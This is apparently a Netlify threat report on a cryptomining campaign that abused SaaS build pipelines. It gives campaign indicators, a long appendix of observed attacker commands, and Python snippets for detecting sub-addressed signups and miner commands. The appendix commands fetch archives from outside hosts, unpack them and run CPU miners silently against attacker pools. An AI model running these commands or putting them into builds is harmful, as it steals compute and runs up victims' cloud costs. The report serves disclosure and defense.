In recent months, the threat intelligence team at Netlify has observed an abusive cryptominer campaign targeting the SaaS industry. The aim of the campaign has been to mine cryptocurrencies optimized for CPU-based mining by abusing cloud SaaS infrastructure. The goal of this report is to share details about the observed campaign with the wider information security community, so companies can enhance their defenses against such abuse.

Netlify is committed to uncovering threats that affect the wider industry. Our hope is that the protections we employ to secure our customers’ data will be used by our partners and colleagues throughout the industry to make the web a safer place for all.

## Campaign timeframe

The cryptomining campaign discussed in this report operated in several waves of activity. The first ramped up slowly throughout September 2024, peaking and pausing around the beginning of October. Several waves of quicker ramp-ups were observed from mid-October into early November, ceasing completely around November 10, 2024.

Based on the wallet addresses associated with the campaign (discussed below), activity from this campaign has likely occurred in some form since July 2021, with a larger spike in activity seen throughout 2023 and 2024.

## An evolving campaign

During the recently observed waves of the campaign, seven repositories have been used to download and execute cryptomining binaries on target systems. Over the course of the campaign the execution stages evolved several times, likely in an attempt to evade detection. Ultimately, execution has consisted of downloading a cryptominer binary and running said binary with parameters pointed to one of seven wallets and four IPv4 addresses associated with the campaign. During the recent waves of activity, mining was centered around TideCoin, later shifting to VerusCoin. Execution payloads have varied from one to three stages throughout the observed campaign.

The following illustration describes at a high level the campaign’s execution strategy. A detailed description of all discovered execution stages and variations is included in the appendix of this report.

![Illustration describing at a high level the campaign’s execution strategy](https://cdn.sanity.io/images/o0o2tn5x/production/471a6cb360dff64ea2ac8d5d2f94be975d9b4cbe-910x854.png)

## Associated email address and domains

Analysis has uncovered more than 3200 email addresses associated with the cryptominer campaign. Fewer than 250 of these were GMail and Office 365 addresses; the majority were associated with six custom domain names. Details of these domains are included in the appendix of this report. Email addresses used for account signups followed the pattern `prefix`+`random_string`@`domain`[.]`com`. The plus sign (+) is a common sub-addressing method supported by many email providers, allowing for multiple unique email addresses that act as extensions of the primary email address.

In total, 46 unique email addresses were used to generate the approximately 3200 sub-addressed email addresses. It is assumed that the creation of multiple accounts was attempted in order to gain greater concurrent CPU mining capacity.
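One way a platform can surface this signup pattern, shown as an added example that is not Netlify's code: collapse each address to its base by dropping the `+tag`, then report base addresses and domains with many sub-addressed signups. The sample addresses, the `.example` domains, the function names and the threshold are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample signups (not addresses from the campaign).
SAMPLE_SIGNUPS = [
    "builder+x7k2q@mail-a.example",
    "builder+p09zs@mail-a.example",
    "Builder+aa31f@mail-a.example",
    "ops+1@mail-a.example",
    "alice@corp.example",
    "bob+newsletter@corp.example",
    "not-an-email",
]


def canonical_address(email):
    """Collapse local+tag@domain to local@domain; return None if malformed."""
    local, sep, domain = email.strip().lower().rpartition("@")
    if not sep or not local or not domain:
        return None
    base_local = local.split("+", 1)[0]
    if not base_local:
        return None
    return f"{base_local}@{domain}"


def cluster_signups(emails, threshold=3):
    """Map each base address to its distinct signup addresses, keeping only
    bases that were used for at least `threshold` signups."""
    clusters = defaultdict(set)
    for raw in emails:
        base = canonical_address(raw)
        if base is not None:
            clusters[base].add(raw.strip().lower())
    return {b: sorted(v) for b, v in clusters.items() if len(v) >= threshold}


def domain_summary(emails):
    """Per domain: distinct signups, distinct base addresses, and how many
    signups carried a +tag. Many tagged signups over few bases is the
    shape described in the report."""
    stats = {}
    for raw in emails:
        base = canonical_address(raw)
        if base is None:
            continue
        addr = raw.strip().lower()
        entry = stats.setdefault(
            base.rpartition("@")[2],
            {"signups": set(), "bases": set(), "tagged": set()},
        )
        entry["signups"].add(addr)
        entry["bases"].add(base)
        if addr != base:
            entry["tagged"].add(addr)
    return {d: {k: len(v) for k, v in e.items()} for d, e in stats.items()}


if __name__ == "__main__":
    for base, members in cluster_signups(SAMPLE_SIGNUPS).items():
        print(base, len(members))
    for domain, counts in domain_summary(SAMPLE_SIGNUPS).items():
        print(domain, counts)
```

Sub-addressing has legitimate uses, so a cluster is a signal to weigh with other evidence such as shared repositories or build commands, not a verdict on its own.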

Activity associated with these email addresses has originated from a variety of IP address blocks, with 74% being associated with various cloud providers and 64% being associated with Microsoft cloud networks. The following table describes the organizational ownership of IP address blocks discovered to be originating traffic for the abusive email addresses.

| Organization | Account signup occurrences |
| --- | --- |
| Microsoft | 2442 |
| Pt Telkom Indonesia | 383 |
| Protonvpn | 64 |
| Datacamp | 60 |
| OVH | 16 |
| Leaseweb | 13 |
| Other | 274 |

## How successful has their campaign against the industry been?

A total of seven active wallets were used in the campaign, with mining activities focused on [VerusCoin](https://verus.io/), [TideCoin](https://tidecoin.org/), and [Sugarchain](https://sugarchain.org/), all of which are cryptocurrencies designed to be mined on CPU-based hardware. An eighth wallet was also identified in the format of a VerusCoin blockchain hash, but its address could not be found on the VerusCoin blockchain explorer.

In total across the lifetime of all wallets, around $6,500 in cryptocurrency was mined, based on the conversion rates at the time of this writing in December 2024. It is estimated, based on the activity volume of these wallets, that the campaign may have cost upwards of $20,000 - $30,000 a month in cloud spend during months when it was active. That total represents wasted spend across all victims targeted in this cryptomining campaign. Since many cloud platforms offer various free-tier plans with access to some level of cloud compute resources, the compute cost to the abusive campaign is likely close to $0.

A summary of the wallets discovered is as follows:

| Wallet | Coin | Earliest transaction | Total balance transfers \* | USD equivalent \* |
| --- | --- | --- | --- | --- |
| [RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii](https://explorer.verus.io/address/RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii) | VerusCoin | 2021-07-21 | 127.40519181 VRSC | $806.47 |
| [RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c](https://explorer.verus.io/address/RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c) | VerusCoin | 2023-09-10 | 429.83822009 VRSC | $2,720.88 |
| [RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs](https://explorer.verus.io/address/RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs) | VerusCoin | 2024-10-13 | 0.00293549 VRSC | $0.02 |
| [TWmRFcspf257KLgehukxHPdc1pf6g8PDz9](https://explorer.tidecoin.org/address/TWmRFcspf257KLgehukxHPdc1pf6g8PDz9) | TideCoin | 2023-03-10 | 9214.75307631 TDC | $1,773.41 |
| [TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW](https://explorer.tidecoin.org/address/TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW) | TideCoin | 2024-10-02 | 1446.54011315 TDC | $278.39 |
| [sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp](https://sugar.wtf/#/address/sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp) | SugarChain | 2024-07-21 | 1326346.16288581 SUGAR | $346.27 |
| [sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj](https://sugar.wtf/#/address/sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj) | SugarChain | 2024-10-26 | 2226232.43760123 SUGAR | $581.20 |

_\* The total wallet balance transfers and USD rate conversions may change over time._

## Conclusion

This report discusses a cryptominer campaign aimed at abusing cloud compute resources. This particular campaign appears to have been active as early as 2021, with a large uptick in activity taking place throughout 2023 and 2024. Following this conclusion, additional technical details about the campaign are provided as a resource to information security teams tasked with defending against such abuse.

Questions about this report can be directed to [Netlify Security](https://www.netlify.com/security) at [security@netlify.com](mailto:security@netlify.com).

## Appendix: Additional technical details

### Repositories associated with the cryptominer campaign

| Repository | Occurrences observed |
| --- | --- |
| bitbucket\[.\]org/betbeyw/titied | 163,225 |
| gitlab\[.\]com/mantap7091041/node | 129,570 |
| bitbucket\[.\]org/awrbtaehtaey/bluise | 19,304 |
| gitlab\[.\]com/mantap7091041/gas | 5,731 |
| bitbucket\[.\]org/oaebthoae/bluise | 4,367 |
| gitlab\[.\]com/mantap7091041/nodejs | 487 |
| bitbucket\[.\]org/dtmdtn/bluise | 45 |

### Email domains used in the cryptominer campaign

| Email domain | Occurrences observed | Domain registrar | Domain registration date |
| --- | --- | --- | --- |
| butyusa\[.\]com | 1517 | Hostinger | 2023-05-23 |
| gyuil\[.\]com | 801 | WebNIC | 2024-02-04 |
| gimaul\[.\]com | 343 | WebNIC | 2024-01-31 |
| qmaul\[.\]com | 247 | IDWebHost | 2023-12-25 |
| gmail\[.\]com | 211 | n/a | n/a |
| zaknim\[.\]com | 45 | Hostinger | 2023-07-17 |
| outlook\[.\]com | 29 | n/a | n/a |
| gsweety\[.\]com | 7 | WebNIC | 2024-01-26 |

### IPv4 addresses associated with the cryptominer campaign

| IPv4 address | ASN | Location |
| --- | --- | --- |
| 8.215.4.141 | AS45102 Alibaba (US) Technology Co., Ltd. | Jakarta, Indonesia |
| 8.219.2.132 | AS45102 Alibaba (US) Technology Co., Ltd. | Jakarta, Indonesia |
| 47.236.252.96 | AS45102 Alibaba (US) Technology Co., Ltd. | Singapore |
| 178.128.218.13 | AS14061 DigitalOcean, LLC | Singapore |

### Cryptominer binaries used in the campaign

| Binary | Coin | SHA1 | Identifier |
| --- | --- | --- | --- |
| hell | VerusCoin | 86cdddf21f0b3071dcff753fd9db19012fd132f6 | `---------------------------------------------------------------------- Hellminer 0.59.1 [VerusHash 2.2 + PBaaS] Linux ----------------------------------------------------------------------` |
| capeu | TideCoin | 3b8821981d55d791b0283098c7c827450f69ce19 | `********** cpuminer-rplant 5.0.36L-sse2 ***********` |
| cjava | TideCoin | d7445ca0d10b6a89cf6eeaf056081bc7daf18d26 | `********** cpuminer-rplant 5.0.27L-avx2 ***********` |
| sumaker | SugarChain | 5b1855a378dfba329d60764788d52eba556545c7 | `*** sugarmaker 2.5.0-sugar4 by Kanon *** Multi-threaded CPU miner for Sugarchain and other Yespower variants` |

### Detailed view of the execution stages used in the cryptominer campaign

#### Repository: git@bitbucket\[.\]org:awrbtaehtaey/bluise

**Date Range:** 2024-11-05 to 2024-11-08  
**Associated Wallets:**

-   RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii
-   RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c

**Coins Mined:**

-   VerusCoin

**Endpoints:**

-   stratum+tcp://8.219.2.132:80

##### Execution Variations

###### _Variation A_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official > /dev/null 2>&1 && yarn generate
```

**Stage 2:** Source: ./official  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
```

###### _Variation B_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node info.js && yarn generate
>> yarn generate && node info.js
>> node info.js
```

**Stage 2:** Source: node info.js  
**Commands observed:**

```
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 1m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
```

**Stage 3:** Source: ./official  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
```

###### _Variation C_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node info.js
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1
```

**Stage 2:** Source: node info.js  
**Commands observed:**

```
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1
```

**Stage 3:** Source: ./nano  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
```

#### Repository: git@bitbucket\[.\]org:oaebthoae/bluise

**Date Range:** 2024-11-05 to 2024-11-08  
**Associated Wallets:**

-   RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii
-   RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c

**Coins Mined:**

-   VerusCoin

**Endpoints:**

-   stratum+tcp://8.219.2.132:80

##### Execution Variations

###### _Variation A_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official > /dev/null 2>&1 && yarn generate
```

**Stage 2:** Source: ./official  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
```

###### _Variation B_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node info.js && yarn generate
>> yarn generate && node info.js
>> node info.js
```

**Stage 2:** Source: node info.js  
**Commands observed:**

```
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 1m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
```

**Stage 3:** Source: ./official  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
```

###### _Variation C_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node info.js
```

**Stage 2:** Source: node info.js  
**Commands observed:**

```
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1
```

**Stage 3:** Source: ./nano  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
```

#### Repository: git@bitbucket\[.\]org:betbeyw/titied

**Date Range:** 2024-10-22 to 2024-11-05  
**Associated Wallets:**

-   RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c
-   RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii
-   sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj
-   TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW

**Coins Mined:**

-   SugarChain
-   TideCoin
-   VerusCoin

**Endpoints:**

-   178.128.218.13:80
-   stratum+tcp://8.215.4.141:443
-   stratum+tcp://8.219.2.132:80

##### Execution Variations

###### _Variation A_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> npm run build && ./next
>> npm run build && chmod +x next && ./next
>> chmod +x next && ./next
```

**Stage 2:** Source: ./next  
**Commands observed:**

-   Bash script:

```
wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz
echo "Downloaded sumaker"
tar -xf titied.tar.gz
echo "Running sumaker for 2 minutes"
timeout 10m ./gas > /dev/null 2>&1
echo "sumaker finished, starting npm run build"
npm run build
```

**Stage 3:** Source: ./gas  
**Commands observed:**

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)
```

###### _Variation B_

**Stage 1:** Source: CI/CD

```
>> node data.js
```

**Stage 2:** Source: node data.js

```
>> wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz && tar -xf titied.tar.gz && timeout 10m ./gas > /dev/null 2>&1
```

**Stage 3:** Source: ./gas

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)
```

###### _Variation C_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node data.js
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> wget -q https://gitlab[.]com/maximus.sale1/file/-/raw/main/sumaker.tar.gz && tar -xf sumaker.tar.gz && timeout 10m ./gas > /dev/null 2>&1
```

**Stage 3:** Source: ./gas  
**Commands observed:**

```
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj.lol -t $(nproc --all)
```

###### _Variation D_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node data.js
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1
```

**Stage 3:** Source: ./nano  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
```

###### _Variation E_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node data.js && npm run build
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz && tar -xf titied.tar.gz && timeout 15m ./gas > /dev/null 2>&1
```

**Stage 3:** Source: ./gas  
**Commands observed:**

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)
```

###### _Variation F_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node data.js && npm run build
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1
```

**Stage 3:** Source: ./nano  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
```

###### _Variation G_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node data.js && npm run build
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all) > /dev/null 2>&1';
```

###### _Variation H_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> npm run build && node data.js
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
```

**Stage 3:** Source: ./official  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
```

#### Repository: git@gitlab\[.\]com:mantap7091041/nodejs

**Date Range:** 2024-09-27 to 2024-11-04  
**Associated Wallets:**

-   R9sx8KeC2qeGfpvC4GXiXoxkA5KEYE7wYU
-   RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs
-   sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp
-   TWmRFcspf257KLgehukxHPdc1pf6g8PDz9

**Coins Mined:**

-   SugarChain
-   TideCoin
-   VerusCoin

**Endpoints:**

-   47.236.252.96:443
-   178.128.218.13:80
-   stratum+tcp://8.215.4.141:80
-   stratum+tcp://8.215.4.141:443
-   stratum+tcp://8.219.2.132:80

##### Execution Variations

###### _Variation A_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1
```

###### _Variation B_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all)
```

###### _Variation C_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1
```

###### _Variation D_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
```

**Stage 2:** Source: ./gas  
**Commands observed:**

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
```

###### _Variation E_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
```

**Stage 2:** Source: ./gas  
**Commands observed:**

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
```

###### _Variation F_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node data.js
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> wget https://gitlab[.]com/mantap7091041/gas/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1
```

**Stage 3:** Source: ./gas  
**Commands observed:**

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
```

###### _Variation G_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node data.js
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1
```

**Stage 3:** Source: ./gas  
**Commands observed:**

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
```

###### _Variation H_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node data.js
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./hell -c stratum+tcp://8.219.2.132:80 -u R9sx8KeC2qeGfpvC4GXiXoxkA5KEYE7wYU.yesss -p x --cpu $(nproc --all) > /dev/null 2>&1
```

#### Repository: git@gitlab\[.\]com:mantap7091041/node

**Date Range:** 2024-09-27 to 2024-10-28  
**Associated Wallets:**

-   RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs
-   sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp
-   TWmRFcspf257KLgehukxHPdc1pf6g8PDz9

**Coins Mined:**

-   SugarChain
-   TideCoin
-   VerusCoin

**Endpoints:**

-   47.236.252.96:443
-   178.128.218.13:80
-   stratum+tcp://8.215.4.141:80
-   stratum+tcp://8.215.4.141:443

##### Execution Variations

###### _Variation A_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1
```

###### _Variation B_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all)
```

###### _Variation C_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1
```

###### _Variation D_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
```

**Stage 2:** Source: ./gas  
**Commands observed:**

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
```

###### _Variation E_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> node data.js
```

**Stage 2:** Source: node data.js  
**Commands observed:**

```
>> unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1
```

**Stage 3:** Source: ./gas  
**Commands observed:**

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
```

#### Repository: git@gitlab\[.\]com:mantap7091041/gas

**Date Range:** 2024-09-27 to 2024-10-26  
**Associated Wallets:**

-   RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs
-   sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp
-   TWmRFcspf257KLgehukxHPdc1pf6g8PDz9

**Coins Mined:**

-   SugarChain
-   TideCoin
-   VerusCoin

**Endpoints:**

-   47.236.252.96:443
-   178.128.218.13:80
-   stratum+tcp://8.215.4.141:80
-   stratum+tcp://8.215.4.141:443

##### Execution Variations

###### _Variation A_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1
```

###### _Variation B_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all)
```

###### _Variation C_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1
```

###### _Variation D_

**Stage 1:** Source: CI/CD  
**Commands observed:**

```
>> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
```

**Stage 2:** Source: ./gas

```
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
```
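The command shapes recorded in this appendix can be turned into a build-command check. The following is an added example, not Netlify's detection code: it scores a command line against indicators drawn from the stages above (stratum URL, IP-literal pool, `wallet.worker` user, all-cores thread count, download-unpack-run chains, timed and silenced execution) and flags it when two or more match. The indicator names, threshold, sample commands, hosts and wallet-like strings are constructed placeholders.

```python
import re

# Indicators derived from the command shapes listed in this appendix.
INDICATORS = {
    "stratum_url": re.compile(r"stratum\+\w+://", re.I),
    "ip_literal_pool": re.compile(
        r"(?<!\S)-[oc]\s+(?:stratum\+\w+://)?(?:\d{1,3}\.){3}\d{1,3}:\d+"),
    "wallet_dot_worker": re.compile(r"(?<!\S)-u\s+[A-Za-z0-9]{26,}\.\S+"),
    "all_cores": re.compile(r"(?<!\S)(?:-t|--cpu)\s+\$\(nproc\b[^)]*\)"),
    "yespower_algo": re.compile(r"(?<!\S)-a\s+yespower\w*", re.I),
    "fetch_unpack_run": re.compile(
        r"\b(?:wget|curl)\b.*?&&\s*(?:unzip|tar)\b.*?&&.*?\./[\w.-]+"),
    "timed_silent_run": re.compile(
        r"\btimeout\s+\d+[smh]?\s+\./\S+.*>\s*/dev/null"),
}

# Constructed sample commands: documentation IPs, placeholder wallet strings.
SAMPLE_COMMANDS = [
    "wget -q https://files.example/pkg.tar.gz && tar -xf pkg.tar.gz "
    "&& timeout 15m ./runner > /dev/null 2>&1",
    "./miner -c stratum+tcp://192.0.2.10:80 "
    "-u RExampleWalletPlaceholder0000000001.worker1 -p x --cpu $(nproc --all)",
    "chmod +x tool && ./tool -a yespowertide -o 192.0.2.20:80 "
    "-u TExampleWalletPlaceholder000000002.w -p x -t $(nproc --all)",
    "npm run build",
    "curl -sSL https://downloads.example/cli.tar.gz && tar -xzf cli.tar.gz "
    "&& ./cli/install.sh",
    "node data.js",
]


def scan_command(command):
    """Return the names of all indicators that match one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def scan_build_log(commands, min_hits=2):
    """Return (line_number, indicator_names) for commands with at least
    `min_hits` indicators. A single hit is ignored because legitimate
    builds also download, unpack and run installers."""
    findings = []
    for line_no, command in enumerate(commands, start=1):
        hits = scan_command(command)
        if len(hits) >= min_hits:
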